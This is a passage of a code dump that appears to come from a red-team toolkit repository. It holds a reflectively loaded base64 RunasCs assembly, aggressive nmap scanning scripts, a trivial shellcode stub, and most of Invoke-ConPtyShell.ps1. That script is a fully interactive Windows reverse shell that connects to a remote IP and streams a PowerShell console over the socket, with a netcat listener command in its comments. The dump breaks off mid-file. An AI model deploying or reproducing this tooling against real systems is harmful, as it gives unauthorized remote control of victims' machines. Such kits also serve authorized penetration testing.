AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" 87 | $RunasCsBytes = [System.Convert]::FromBase64String($RunasCsBase64) 88 | [Reflection.Assembly]::Load($RunasCsBytes) | Out-Null 89 | $output = [RunasCsMainClass]::RunasCsMain($parameteresRunasCs) 90 | Write-Output $output 91 | } 92 | -------------------------------------------------------------------------------- /scanners/nmap/scan.parallel.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | apt install libnotify-bin parallel 4 | 5 | mkdir -p scans 6 | 7 | if [ $# -eq 0 ] 8 | then 9 | echo "usage: bash scan.parallel.sh [#jobs]" 10 | exit 1 11 | fi 12 | 13 | TARGETS=$1 14 | JOBS=${2:-""} 15 | 16 | echo "Starting TCP Scan with $JOBS jobs" 17 | 18 | parallel -j$JOBS --ungroup --bar -a $TARGETS --max-args 1 'echo TCP: Job {#} of {= $_=total_jobs() =} - {} && echo "scan.parallel.sh" "beginning TCP - {#} / {= $_=total_jobs() =} - {}" && nmap -A -p- -v --reason -T5 -sS --script "(default or safe or vuln or discovery) and not broadcast" -oA scans/{}.tcp {}' # & 19 | 20 | echo "Starting UDP Scan with $JOBS jobs (top 50 ports)" 21 | 22 | parallel -j$JOBS --ungroup -a $TARGETS --max-args 1 'echo UDP: Job {#} of {= $_=total_jobs() =} - {} && echo "scan.parallel.sh" "beginning UDP - {#} / {= $_=total_jobs() =} - {}" && nmap -sU -sV -T4 --top-ports 50 -oA scans/{}.udp {}' & 23 | 24 | wait 25 | 26 | echo "Done!" 27 | -------------------------------------------------------------------------------- /scanners/nmap/scan.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | for ip in "$@" 4 | do 5 | echo "Creating $ip directory" 6 | 7 | mkdir -p $ip 8 | 9 | echo "Starting TCP Scan for $ip" 10 | 11 | nmap -A -p- --reason -T4 -sS --script "(default or safe or vuln or intrusive or discovery) and not broadcast" -oA $ip/$ip.tcp $ip & 12 | 13 | echo "Starting UDP Scan for $ip" 14 | 15 | nmap -sU -sV -T4 --top-ports 100 --script "(default or safe or vuln or intrusive or discovery) and not broadcast" -oA $ip/$ip.udp $ip & 16 | done 17 | 18 | wait 19 | 20 | echo "Done!" 21 | -------------------------------------------------------------------------------- /shellcode/pic.asm: -------------------------------------------------------------------------------- 1 | ; nasm -felf64 test.asm -o test.o && ld test.o -o test && chmod u+x test && ./test 2 | SYS_WRITE equ 1 3 | SYS_EXIT equ 60 4 | STD_OUTPUT equ 1 5 | 6 | section .text 7 | global _start 8 | 9 | _start: 10 | mov rax, SYS_WRITE 11 | mov rdi, STD_OUTPUT 12 | lea rsi, [rel msg] 13 | mov rdx, msglen 14 | syscall 15 | mov rax, SYS_EXIT 16 | mov rdi, 0 17 | syscall 18 | msg: db `Shellcode: "Hello world!"\n` 19 | msglen equ $-msg 20 | -------------------------------------------------------------------------------- /shells/ConPtyShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/shells/ConPtyShell.exe -------------------------------------------------------------------------------- /shells/Invoke-ConPtyShell.ps1: -------------------------------------------------------------------------------- 1 | #Requires -Version 2 2 | 3 | function Invoke-ConPtyShell 4 | { 5 | <# 6 | .SYNOPSIS 7 | ConPtyShell - Fully Interactive Reverse Shell for Windows 8 | Author: splinter_code 9 | License: MIT 10 | Source: https://github.com/antonioCoco/ConPtyShell 11 | 12 | .DESCRIPTION 13 | ConPtyShell - Fully interactive reverse shell for Windows 14 | 15 | Properly set the rows and cols values. You can retrieve it from 16 | your terminal with the command "stty size". 17 | 18 | You can avoid to set rows and cols values if you run your listener 19 | with the following command: 20 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 21 | 22 | If you want to change the console size directly from powershell 23 | you can paste the following commands: 24 | $width=80 25 | $height=24 26 | $Host.UI.RawUI.BufferSize = New-Object Management.Automation.Host.Size ($width, $height) 27 | $Host.UI.RawUI.WindowSize = New-Object -TypeName System.Management.Automation.Host.Size -ArgumentList ($width, $height) 28 | 29 | 30 | .PARAMETER RemoteIp 31 | The remote ip to connect 32 | .PARAMETER RemotePort 33 | The remote port to connect 34 | .PARAMETER Rows 35 | Rows size for the console 36 | Default: "24" 37 | .PARAMETER Cols 38 | Cols size for the console 39 | Default: "80" 40 | .PARAMETER CommandLine 41 | The commandline of the process that you are going to interact 42 | Default: "powershell.exe" 43 | 44 | .EXAMPLE 45 | PS>Invoke-ConPtyShell 10.0.0.2 3001 46 | 47 | Description 48 | ----------- 49 | Spawn a reverse shell 50 | 51 | .EXAMPLE 52 | PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 53 | 54 | Description 55 | ----------- 56 | Spawn a reverse shell with specific rows and cols size 57 | 58 | .EXAMPLE 59 | PS>Invoke-ConPtyShell -RemoteIp 10.0.0.2 -RemotePort 3001 -Rows 30 -Cols 90 -CommandLine cmd.exe 60 | 61 | Description 62 | ----------- 63 | Spawn a reverse shell (cmd.exe) with specific rows and cols size 64 | 65 | #> 66 | Param 67 | ( 68 | [Parameter(Position = 0, Mandatory = $True)] 69 | [String] 70 | $RemoteIp, 71 | 72 | [Parameter(Position = 1, Mandatory = $True)] 73 | [String] 74 | $RemotePort, 75 | 76 | [Parameter()] 77 | [String] 78 | $Rows = "24", 79 | 80 | [Parameter()] 81 | [String] 82 | $Cols = "80", 83 | 84 | [Parameter()] 85 | [String] 86 | $CommandLine = "powershell.exe" 87 | ) 88 | $parametersConPtyShell = @($RemoteIp, $RemotePort, $Rows, $Cols, $CommandLine) 89 | Add-Type -TypeDefinition $Source -Language CSharp; 90 | $output = [ConPtyShellMainClass]::ConPtyShellMain($parametersConPtyShell) 91 | Write-Output $output 92 | } 93 | 94 | $Source = @" 95 | using System; 96 | using System.IO; 97 | using System.Text; 98 | using System.Threading; 99 | using System.Net; 100 | using System.Net.Sockets; 101 | using System.Runtime.InteropServices; 102 | 103 | public static class ConPtyShell 104 | { 105 | private const string errorString = "{{{ConPtyShellException}}}\r\n"; 106 | private const uint ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004; 107 | private const uint DISABLE_NEWLINE_AUTO_RETURN = 0x0008; 108 | private const uint PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE = 0x00020016; 109 | private const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; 110 | private const uint CREATE_NO_WINDOW = 0x08000000; 111 | private const int STARTF_USESTDHANDLES = 0x00000100; 112 | 113 | private const UInt32 INFINITE = 0xFFFFFFFF; 114 | private const uint GENERIC_READ = 0x80000000; 115 | private const uint GENERIC_WRITE = 0x40000000; 116 | private const uint FILE_SHARE_READ = 0x00000001; 117 | private const uint FILE_SHARE_WRITE = 0x00000002; 118 | private const uint FILE_ATTRIBUTE_NORMAL = 0x80; 119 | private const uint OPEN_EXISTING = 3; 120 | private const int STD_INPUT_HANDLE = -10; 121 | private const int STD_OUTPUT_HANDLE = -11; 122 | private const int STD_ERROR_HANDLE = -12; 123 | 124 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 125 | private struct STARTUPINFOEX 126 | { 127 | public STARTUPINFO StartupInfo; 128 | public IntPtr lpAttributeList; 129 | } 130 | 131 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 132 | private struct STARTUPINFO 133 | { 134 | public Int32 cb; 135 | public string lpReserved; 136 | public string lpDesktop; 137 | public string lpTitle; 138 | public Int32 dwX; 139 | public Int32 dwY; 140 | public Int32 dwXSize; 141 | public Int32 dwYSize; 142 | public Int32 dwXCountChars; 143 | public Int32 dwYCountChars; 144 | public Int32 dwFillAttribute; 145 | public Int32 dwFlags; 146 | public Int16 wShowWindow; 147 | public Int16 cbReserved2; 148 | public IntPtr lpReserved2; 149 | public IntPtr hStdInput; 150 | public IntPtr hStdOutput; 151 | public IntPtr hStdError; 152 | } 153 | 154 | [StructLayout(LayoutKind.Sequential)] 155 | private struct PROCESS_INFORMATION 156 | { 157 | public IntPtr hProcess; 158 | public IntPtr hThread; 159 | public int dwProcessId; 160 | public int dwThreadId; 161 | } 162 | 163 | [StructLayout(LayoutKind.Sequential)] 164 | private struct SECURITY_ATTRIBUTES 165 | { 166 | public int nLength; 167 | public IntPtr lpSecurityDescriptor; 168 | public int bInheritHandle; 169 | } 170 | 171 | [StructLayout(LayoutKind.Sequential)] 172 | private struct COORD 173 | { 174 | public short X; 175 | public short Y; 176 | } 177 | 178 | [DllImport("kernel32.dll", SetLastError = true)] 179 | [return: MarshalAs(UnmanagedType.Bool)] 180 | private static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); 181 | 182 | [DllImport("kernel32.dll", SetLastError = true)] 183 | [return: MarshalAs(UnmanagedType.Bool)] 184 | private static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); 185 | 186 | [DllImport("kernel32.dll", SetLastError = true)] 187 | [return: MarshalAs(UnmanagedType.Bool)] 188 | private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 189 | 190 | [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)] 191 | private static extern bool CreateProcessW(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 192 | 193 | [DllImport("kernel32.dll", SetLastError=true)] 194 | [return: MarshalAs(UnmanagedType.Bool)] 195 | private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode); 196 | 197 | [DllImport("kernel32.dll", SetLastError=true)] 198 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 199 | 200 | [DllImport("kernel32.dll", SetLastError=true)] 201 | private static extern bool SetStdHandle(int nStdHandle, IntPtr hHandle); 202 | 203 | [DllImport("kernel32.dll", SetLastError = true)] 204 | private static extern IntPtr GetStdHandle(int nStdHandle); 205 | 206 | [DllImport("kernel32.dll", SetLastError = true)] 207 | private static extern bool CloseHandle(IntPtr hObject); 208 | 209 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 210 | private static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe, SECURITY_ATTRIBUTES lpPipeAttributes, int nSize); 211 | 212 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall, SetLastError = true)] 213 | private static extern IntPtr CreateFile(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr SecurityAttributes, uint dwCreationDisposition, uint dwFlagsAndAttributes, IntPtr hTemplateFile); 214 | 215 | [DllImport("kernel32.dll", SetLastError = true)] 216 | private static extern bool ReadFile(IntPtr hFile, [Out] byte[] lpBuffer, uint nNumberOfBytesToRead, out uint lpNumberOfBytesRead, IntPtr lpOverlapped); 217 | 218 | [DllImport("kernel32.dll", SetLastError=true)] 219 | private static extern bool WriteFile(IntPtr hFile, byte [] lpBuffer, uint nNumberOfBytesToWrite, out uint lpNumberOfBytesWritten, IntPtr lpOverlapped); 220 | 221 | [DllImport("kernel32.dll", SetLastError = true)] 222 | private static extern int CreatePseudoConsole(COORD size, IntPtr hInput, IntPtr hOutput, uint dwFlags, out IntPtr phPC); 223 | 224 | [DllImport("kernel32.dll", SetLastError = true)] 225 | private static extern int ClosePseudoConsole(IntPtr hPC); 226 | 227 | [DllImport("kernel32.dll", SetLastError = true)] 228 | private static extern bool SetConsoleMode(IntPtr hConsoleHandle, uint mode); 229 | 230 | [DllImport("kernel32.dll", SetLastError = true)] 231 | private static extern bool GetConsoleMode(IntPtr handle, out uint mode); 232 | 233 | [DllImport("kernel32.dll", CharSet=CharSet.Auto)] 234 | private static extern IntPtr GetModuleHandle(string lpModuleName); 235 | 236 | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] 237 | private static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 238 | 239 | private static Socket ConnectSocket(string remoteIp, int remotePort){ 240 | Socket s = null; 241 | IPAddress remoteIpInt = IPAddress.Parse(remoteIp); 242 | IPEndPoint ipEndpoint = new IPEndPoint(remoteIpInt, remotePort); 243 | Socket shellSocket = new Socket(ipEndpoint.AddressFamily, SocketType.Stream, ProtocolType.Tcp); 244 | try{ 245 | shellSocket.Connect(ipEndpoint); 246 | if(shellSocket.Connected) 247 | s = shellSocket; 248 | byte[] banner = Encoding.ASCII.GetBytes("\r\nConPtyShell - @splinter_code\r\n"); 249 | s.Send(banner); 250 | } 251 | catch{ 252 | s = null; 253 | } 254 | return s; 255 | } 256 | 257 | private static void TryParseRowsColsFromSocket(Socket shellSocket, ref uint rows, ref uint cols){ 258 | Thread.Sleep(500);//little tweak for slower connections 259 | if (shellSocket.Available > 0){ 260 | byte[] received = new byte[100]; 261 | int rowsTemp, colsTemp; 262 | int bytesReceived = shellSocket.Receive(received); 263 | string sizeReceived = Encoding.ASCII.GetString(received,0,bytesReceived); 264 | string rowsString = sizeReceived.Split(' ')[0].Trim(); 265 | string colsString = sizeReceived.Split(' ')[1].Trim(); 266 | if(Int32.TryParse(rowsString, out rowsTemp) && Int32.TryParse(colsString, out colsTemp)){ 267 | rows=(uint)rowsTemp; 268 | cols=(uint)colsTemp; 269 | } 270 | } 271 | } 272 | 273 | private static void CreatePipes(ref IntPtr InputPipeRead, ref IntPtr InputPipeWrite, ref IntPtr OutputPipeRead, ref IntPtr OutputPipeWrite){ 274 | int securityAttributeSize = Marshal.SizeOf(); 275 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize, bInheritHandle=1, lpSecurityDescriptor=IntPtr.Zero }; 276 | if(!CreatePipe(out InputPipeRead, out InputPipeWrite, pSec, 0)) 277 | throw new InvalidOperationException("Could not create the InputPipe"); 278 | if(!CreatePipe(out OutputPipeRead, out OutputPipeWrite, pSec, 0)) 279 | throw new InvalidOperationException("Could not create the OutputPipe"); 280 | } 281 | 282 | private static void InitConsole(){ 283 | IntPtr hStdout = CreateFile("CONOUT$", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, IntPtr.Zero); 284 | IntPtr hStdin = CreateFile("CONIN$", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, IntPtr.Zero); 285 | SetStdHandle(STD_OUTPUT_HANDLE, hStdout); 286 | SetStdHandle(STD_ERROR_HANDLE, hStdout); 287 | SetStdHandle(STD_INPUT_HANDLE, hStdin); 288 | } 289 | 290 | private static void EnableVirtualTerminalSequenceProcessing() 291 | { 292 | uint outConsoleMode = 0; 293 | IntPtr hStdOut = GetStdHandle(STD_OUTPUT_HANDLE); 294 | if (!GetConsoleMode(hStdOut, out outConsoleMode)) 295 | { 296 | throw new InvalidOperationException("Could not get console mode"); 297 | } 298 | outConsoleMode |= ENABLE_VIRTUAL_TERMINAL_PROCESSING | DISABLE_NEWLINE_AUTO_RETURN; 299 | if (!SetConsoleMode(hStdOut, outConsoleMode)) 300 | { 301 | throw new InvalidOperationException("Could not enable virtual terminal processing"); 302 | } 303 | } 304 | 305 | private static int CreatePseudoConsoleWithPipes(ref IntPtr handlePseudoConsole, ref IntPtr ConPtyInputPipeRead, ref IntPtr ConPtyOutputPipeWrite, uint rows, uint cols){ 306 | int result = -1; 307 | EnableVirtualTerminalSequenceProcessing(); 308 | result = CreatePseudoConsole(new COORD { X = (short)cols, Y = (short)rows }, ConPtyInputPipeRead, ConPtyOutputPipeWrite, 0, out handlePseudoConsole); 309 | return result; 310 | } 311 | 312 | private static STARTUPINFOEX ConfigureProcessThread(IntPtr handlePseudoConsole, IntPtr attributes) 313 | { 314 | IntPtr lpSize = IntPtr.Zero; 315 | bool success = InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); 316 | if (success || lpSize == IntPtr.Zero) 317 | { 318 | throw new InvalidOperationException("Could not calculate the number of bytes for the attribute list. " + Marshal.GetLastWin32Error()); 319 | } 320 | STARTUPINFOEX startupInfo = new STARTUPINFOEX(); 321 | startupInfo.StartupInfo.cb = Marshal.SizeOf(); 322 | startupInfo.lpAttributeList = Marshal.AllocHGlobal(lpSize); 323 | success = InitializeProcThreadAttributeList(startupInfo.lpAttributeList, 1, 0, ref lpSize); 324 | if (!success) 325 | { 326 | throw new InvalidOperationException("Could not set up attribute list. " + Marshal.GetLastWin32Error()); 327 | } 328 | success = UpdateProcThreadAttribute(startupInfo.lpAttributeList, 0, attributes, handlePseudoConsole, (IntPtr)IntPtr.Size, IntPtr.Zero,IntPtr.Zero); 329 | if (!success) 330 | { 331 | throw new InvalidOperationException("Could not set pseudoconsole thread attribute. " + Marshal.GetLastWin32Error()); 332 | } 333 | return startupInfo; 334 | } 335 | 336 | private static PROCESS_INFORMATION RunProcess(ref STARTUPINFOEX sInfoEx, string commandLine) 337 | { 338 | PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); 339 | int securityAttributeSize = Marshal.SizeOf(); 340 | SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize }; 341 | SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES { nLength = securityAttributeSize }; 342 | bool success = CreateProcess(null, commandLine, ref pSec, ref tSec, false, EXTENDED_STARTUPINFO_PRESENT, IntPtr.Zero, null, ref sInfoEx, out pInfo); 343 | if (!success) 344 | { 345 | throw new InvalidOperationException("Could not create process. " + Marshal.GetLastWin32Error()); 346 | } 347 | return pInfo; 348 | } 349 | 350 | private static PROCESS_INFORMATION CreateChildProcessWithPseudoConsole(IntPtr handlePseudoConsole, string commandLine){ 351 | STARTUPINFOEX startupInfo = ConfigureProcessThread(handlePseudoConsole, (IntPtr)PROC_THREAD_ATTRIBUTE_PSEUDOCONSOLE); 352 | PROCESS_INFORMATION processInfo = RunProcess(ref startupInfo, commandLine); 353 | return processInfo; 354 | } 355 | 356 | private static void ThreadReadPipeWriteSocket(object threadParams) 357 | { 358 | object[] threadParameters = (object[]) threadParams; 359 | IntPtr OutputPipeRead = (IntPtr)threadParameters[0]; 360 | Socket shellSocket = (Socket)threadParameters[1]; 361 | uint bufferSize=16*1024; 362 | byte[] bytesToWrite = new byte[bufferSize]; 363 | bool readSuccess = false; 364 | Int32 bytesSent = 0; 365 | uint dwBytesRead=0; 366 | do{ 367 | readSuccess = ReadFile(OutputPipeRead, bytesToWrite, bufferSize, out dwBytesRead, IntPtr.Zero); 368 | bytesSent = shellSocket.Send(bytesToWrite, (Int32)dwBytesRead, 0); 369 | } while (bytesSent > 0 && readSuccess); 370 | } 371 | 372 | private static Thread StartThreadReadPipeWriteSocket(IntPtr OutputPipeRead, Socket shellSocket){ 373 | object[] threadParameters = new object[2]; 374 | threadParameters[0]=OutputPipeRead; 375 | threadParameters[1]=shellSocket; 376 | Thread thThreadReadPipeWriteSocket = new Thread(ThreadReadPipeWriteSocket); 377 | thThreadReadPipeWriteSocket.Start(threadParameters); 378 | return thThreadReadPipeWriteSocket; 379 | } 380 | 381 | private static void ThreadReadSocketWritePipe(object threadParams) 382 | { 383 | object[] threadParameters = (object[]) threadParams; 384 | IntPtr InputPipeWrite = (IntPtr)threadParameters[0]; 385 | Socket shellSocket = (Socket)threadParameters[1]; 386 | IntPtr hChildProcess = (IntPtr)threadParameters[2]; 387 | uint 